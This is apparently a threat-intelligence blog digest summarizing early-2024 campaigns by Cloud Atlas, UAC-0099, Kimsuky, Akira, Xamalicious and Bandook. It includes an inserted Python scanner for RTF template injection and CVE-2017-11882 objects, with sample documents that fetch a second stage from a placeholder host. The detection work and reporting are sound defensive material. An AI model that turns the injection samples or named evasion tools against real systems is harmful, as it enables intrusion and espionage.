Thursday, January 4, 2024

Fog of Cyber Warfare: Cloud Atlas Spies Attack Russian Companies Under the Guise of Supporting NWO Participants

Cloud Atlas is a pro-government advanced persistent threat (APT) group that specializes in cyber espionage and theft of confidential information. The group has been active since at least 2014 and is known for targeting organizations in Russia, Belarus, Azerbaijan, Turkey, and Slovenia. They have been observed using various tactics and techniques to carry out their attacks, including spear-phishing emails with malicious attachments and exploiting vulnerabilities in popular software.

In a recent campaign, Cloud Atlas targeted a Russian agro-industrial enterprise and a state-owned research company. The attackers sent their victims phishing emails with malicious attachments crafted to mimic government statements, media articles, business proposals, or advertisements. They first used reconnaissance documents to collect the victims' IP information, then exploited CVE-2017-11882 via RTF template injection to gain initial access to the targets' systems.
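As an added defender-side check (not from the original post or from any of the cited reports), the following Python scanner flags the two RTF features this entry describes: a remote `\*\template` reference (template injection) and an embedded Equation Editor object, the component CVE-2017-11882 lives in. The sample documents and the URL are constructed placeholders.

```python
import re

# Constructed sample RTF fragments (not real Cloud Atlas documents).
# On disk, RTF template injection is a remote path inside {\*\template ...}:
# Word fetches that file when the document opens.
SAMPLE_INJECTED = (
    r"{\rtf1\ansi\deff0"
    r"{\*\template http://example.invalid/stage2.dotm}"
    r"{\fonttbl{\f0 Calibri;}}"
    r"\pard Quarterly report attached.\par}"
)
# Constructed embedded Equation Editor object, the OLE class CVE-2017-11882 targets.
SAMPLE_EQUATION = (
    r"{\rtf1\ansi"
    r"{\object\objemb{\*\objclass Equation.3}"
    r"{\*\objdata 01050000020000000b0000004571756174696f6e2e330000}}"
    r"\par}"
)
SAMPLE_BENIGN = r"{\rtf1\ansi\deff0{\fonttbl{\f0 Arial;}}\pard Hello\par}"

# Capture the argument of each control word up to the closing brace.
TEMPLATE_RE = re.compile(r"\\\*\\template\s+(?P<target>[^}]+)", re.IGNORECASE)
OBJCLASS_RE = re.compile(r"\\\*\\objclass\s+(?P<cls>[^}\\]+)", re.IGNORECASE)
# URL schemes and UNC paths mean the template is pulled from elsewhere.
REMOTE_RE = re.compile(r"^(https?://|ftps?://|\\\\)", re.IGNORECASE)


def scan_rtf(text: str) -> list[str]:
    """Return human-readable findings for one RTF document (empty if clean).

    Caveat: the template argument may be obfuscated with \\uN or \\'hh escapes;
    this plain-text check does not decode those, so treat it as a first filter.
    """
    findings = []
    for m in TEMPLATE_RE.finditer(text):
        target = m.group("target").strip()
        # A local template path is normal; a URL or UNC path is template injection.
        if REMOTE_RE.match(target):
            findings.append(f"remote template reference: {target}")
    for m in OBJCLASS_RE.finditer(text):
        cls = m.group("cls").strip()
        if cls.lower().startswith("equation"):
            findings.append(f"embedded Equation Editor object ({cls}), CVE-2017-11882 surface")
    return findings


if __name__ == "__main__":
    for name, doc in [("injected", SAMPLE_INJECTED), ("equation", SAMPLE_EQUATION), ("benign", SAMPLE_BENIGN)]:
        print(name, scan_rtf(doc) or "clean")
```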

Cloud Atlas is known for simple but effective spear-phishing campaigns. The group has not been observed using open-source implants in its recent campaigns, possibly to remain less conspicuous. Its toolkit has not changed for years, and it continues to refine its attacks to avoid detection.

REFERENCES

  • https://thehackernews.com/2023/12/cloud-atlas-spear-phishing-attacks.html
  • https://therecord.media/cloud-atlas-targets-russian-orgs-war-phishing
  • https://www.facct.ru/blog/cloud-atlas/
  • https://otx.alienvault.com/pulse/658c94713412afcbac226057

TAGS

Cloud Atlas, apt, phishing, vbs, rtf, maldoc, CVE-2017-11882, HTA

Wednesday, January 3, 2024

Threat Actor 'UAC-0099' Continues to Target Ukraine

The threat actor "UAC-0099" has been targeting Ukraine since mid-2022. This actor has been observed leveraging various tactics and techniques to carry out cyber attacks, including the use of a high-severity WinRAR flaw (CVE-2023-38831) to deliver the LONEPAGE malware. The group targets Ukrainian employees working for companies outside of Ukraine and has been linked to attacks against state organizations and media entities for espionage motives. The attacks involve different infection vectors, such as phishing messages containing HTA, RAR, and LNK file attachments, leading to the deployment of the LONEPAGE malware, a Visual Basic Script (VBS) capable of contacting a command-and-control (C2) server, stealing information, and taking screenshots. The threat actor's activities have been documented by the Computer Emergency Response Team of Ukraine (CERT-UA), and their attacks continue to evolve, demonstrating a high level of sophistication.

REFERENCES

  • https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine
  • https://otx.alienvault.com/pulse/658c7d1e6e6bd875e46d467e

TAGS

powershell, uac0099, winrar, docx, ukraine, vbs, phishing, CVE-2023-38831

Analysis of Kimsuky Group's AppleSeed Malware Attack Trends

The Kimsuky Group, a North Korea-based cyber-attack group, has been using the AppleSeed malware in its attacks since 2022. The group constantly launches spear-phishing attacks against South Korean users and distributes its malware through several methods, including JavaScript, Excel macro malware, and shortcut-type malware in LNK file format. It has also been observed using Meterpreter and TinyNuke to seize control of compromised machines.

AppleSeed is a backdoor that can receive instructions from an actor-controlled server, drop additional payloads, and exfiltrate sensitive data such as files, keystrokes, and screenshots. A variant of AppleSeed named AlphaSeed, developed in Golang and using chromedp to communicate with the command-and-control server, has also been observed. The group typically uses RDP to control infected systems, but in recent cases it has also installed Chrome Remote Desktop.

The Kimsuky Group's attacks aim to steal internal information and technology from organizations. While the group typically relies on spear-phishing for initial access, most of its recent attacks use shortcut-type malware in LNK file format. Although LNK malware makes up a large share of recent attacks, cases using JavaScript or malicious documents are also being detected.

REFERENCES

  • https://thehackernews.com/2023/12/kimsuky-hackers-deploying-appleseed.html
  • https://asec.ahnlab.com/en/60054/
  • https://otx.alienvault.com/pulse/658c565578c6361b0ed9617a

TAGS

kimsuky, phishing, LNK, javascript, appleseed, macro, excel, alphaseed, chrome remote desktop, backdoor, infostealer, TightVNC, TinyNuke, meterpreter


Akira, again: The ransomware that keeps on taking

Akira is a ransomware family that has been active since March 2023. It is known for its highly experienced and skilled operators, who use various tactics to gain initial access, maintain persistence, and evade defenses. The operators have been observed using compromised VPN credentials, targeting vulnerable Cisco VPNs, and creating a new domain account on the compromised system. For defense evasion they use PowerTool or a KillAV tool that abuses the Zemana AntiMalware driver to terminate security processes, and for discovery they use PCHunter, SharpHound, AdFind, the Windows net command, nltest, Advanced IP Scanner, and MASSCAN to gather system and domain information. The ransomware is named after a 1988 anime movie of the same name, and its operators use a cyberpunk aesthetic on their leak site. The ransomware targets corporate networks worldwide, encrypting sensitive files and demanding huge sums of money to restore the data and keep it from being leaked. According to Trend Micro's open-source intelligence research, Akira ransomware actors compromised 107 organizations between April 1 and August 31, 2023. The ransomware remains active and continues to evolve.

REFERENCES

  • https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira
  • https://darktrace.com/blog/akira-ransomware-how-darktrace-foiled-another-novel-ransomware-attack
  • https://www.sentinelone.com/anthology/akira/
  • https://www.trellix.com/about/newsroom/stories/research/akira-ransomware/
  • https://otx.alienvault.com/pulse/658c45ad9b174d9cf1b26ce0

TAGS

winrar, winscp, veeam, mega, ransomware, anydesk, ngrok

Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices

According to the McAfee Mobile Research Team, a new Android backdoor called "Android/Xamalicious" has been identified. It is implemented with Xamarin, an open-source framework for building Android and iOS apps with .NET and C#. The backdoor uses social engineering to obtain accessibility privileges and then contacts its command-and-control server, which decides whether to deliver a second-stage payload. That payload is dynamically injected as an assembly DLL at runtime to take full control of the device and perform financially motivated fraud, such as clicking on ads or installing apps, without user consent. Because the powerful accessibility services were already granted during the first stage, the second stage can take full control of the infected device; the first stage also contains functions to self-update the main APK, so the malware has the potential to act as spyware or a banking trojan without user consent. Based on installation counts, these apps may have compromised at least 327,000 devices through Google Play, plus installations from third-party markets that continue to produce new infections according to the detection telemetry of McAfee clients around the world. This threat remains very active.

REFERENCES

  • https://www.mcafee.com/blogs/other-blogs/mcafee-labs/stealth-backdoor-android-xamalicious-actively-infecting-devices/
  • https://otx.alienvault.com/pulse/658c40da58889532fbfe245c

TAGS

google play, rsa key, android, cash magnet, xamalicious, xamarin, updater, pixel, tarot

Bandook - A Persistent Threat That Keeps Evolving

Bandook is a remote access trojan that has been continuously developed since it was first detected in 2007 and has been used in various campaigns by different threat actors over the years. Recently, FortiGuard Labs identified a new Bandook variant distributed via a PDF file that contains a shortened URL pointing to a password-protected .7z archive. After the victim extracts the malware with the password given in the PDF, the malware injects its payload into msinfo32.exe. This new variant is being distributed via a Spanish-language PDF file.

REFERENCES

  • https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving
  • https://otx.alienvault.com/pulse/658c37500d4737e0ef37ec5c

TAGS

remote access trojan, bandook, appdata, c2 server, init function
